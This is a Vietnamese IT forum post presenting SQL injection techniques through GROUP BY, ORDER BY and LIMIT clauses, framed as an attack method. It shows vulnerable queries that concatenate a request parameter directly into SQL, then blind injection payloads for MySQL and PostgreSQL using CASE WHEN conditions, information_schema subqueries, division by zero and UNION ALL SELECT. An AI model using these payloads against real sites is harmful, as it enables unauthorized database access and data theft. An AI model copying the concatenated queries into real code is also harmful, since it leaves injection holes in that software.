Bạn ghé thăm diễn đàn lần đầu? hãy đăng ký ngay bây giờ để tham gia.
  • Đăng nhập:

Chào mừng bạn đến với ITVNN FORUM - Diễn đàn công nghệ thông tin.

Nếu đây là lần đầu tiên bạn tham gia diễn đàn, xin mời bạn xem phần Hỏi/Ðáp để biết cách dùng diễn đàn. Để có thể tham gia thảo luận bạn phải đăng ký làm thành viên, click vào đây để đăng ký.


  • Partner Area
    • ITVNN HOSTING - Thiết kế website, Cung cấp Domain, Hosting, VPS Việt Nam Anh Hùng - Thông tin truyền thông
kết quả từ 1 tới 1 trên 1
Tăng kích thước phông chữ Giảm kích thước phông chữ
  1. #1
    Cơn Gió's Avatar

    Đầy Tớ Nhân Dân™

    Trạng thái
    Offline
    Tham gia ngày
    Jun 2010
    Thành viên thứ
    24343
    Giới tính
    Bài gởi
    748
    Level: 44 [?]
    Experience: 3,780,309
    Next Level: 4,297,834
    Cảm ơn 96
    Cảm ơn 265 lần / 159 Bài viết

    Exclamation Kỹ thuật tấn công Sql Injection thông qua Group by,Order by,Limit  

    Thông thường các bạn thường tấn công SQL Injection theo mệnh đề where trong câu lệnh select.Hôm nay sẽ mở rộng thêm cách tấn công thông qua Group by,Order by,Limit
    GROUP BY
    vd :đối với MySQL
    Code: 
    "SELECT id, name FROM users GROUP BY "
    . $_GET['id']
    ta có thể biến đổi như sau
    Code: 
    SELECT id, name FROM users GROUP BY 1,
    (SELECT (CASE WHEN (điều kiện) THEN 1 ELSE
    1*(SELECT table_name FROM
    information_schema.tables) END))
    ORDER BY
    vd: đối với PostgreSQL

    Code: 
    "SELECT id, name FROM users ORDER BY "
    . $_GET['id']
    thành
    Code: 
    SELECT id, name FROM users ORDER BY 1,
    (SELECT (CASE WHEN (điều kiện) THEN 1 ELSE
    1/0 END))
    LIMIT
    vd: đối với MySQL
    Code: 
    "SELECT id, name FROM users LIMIT 0, "
    . $_GET['id']
    thành
    Code: 
    SELECT id, name FROM users LIMIT 0, 1
    UNION ALL SELECT (CASE WHEN (điều kiện)
    THEN 1 ELSE 1*(SELECT table_name FROM
    information_schema.tables) END), NULL
    Ở đời , khôn sống , dại chết , ngu thì thua thiệt
    Thế thái lạnh như băng , tình người mỏng như tờ giấy



  2. The Following 4 Thank You to Cơn Gió For This Useful Post:

    Dunglx (15-04-2011),Duyệt Nguyễn (08-07-2011),hanhkhat (28-04-2011),Lovev_Lovev (10-08-2011)


 

Thread Information

Users Browsing this Thread

There are currently 1 users browsing this thread. (0 members and 1 guests)

Similar Threads

  1. Trả lời: 0
    Bài mới gởi: 23-04-2017, 04:05 PM
  2. Trả lời: 0
    Bài mới gởi: 16-06-2016, 03:38 PM
  3. Trả lời: 2
    Bài mới gởi: 11-01-2011, 08:59 AM
  4. Trả lời: 0
    Bài mới gởi: 10-09-2010, 09:56 PM

Tags for this Thread

Bookmarks

Quuyền Hạn Của Bạn

  • Bạn không thể tạo chủ đề mới
  • Bạn không thể trả lời bài viết
  • Bạn không thể gửi file đính kèm
  • Bạn không thể chỉnh sửa bài viết
  •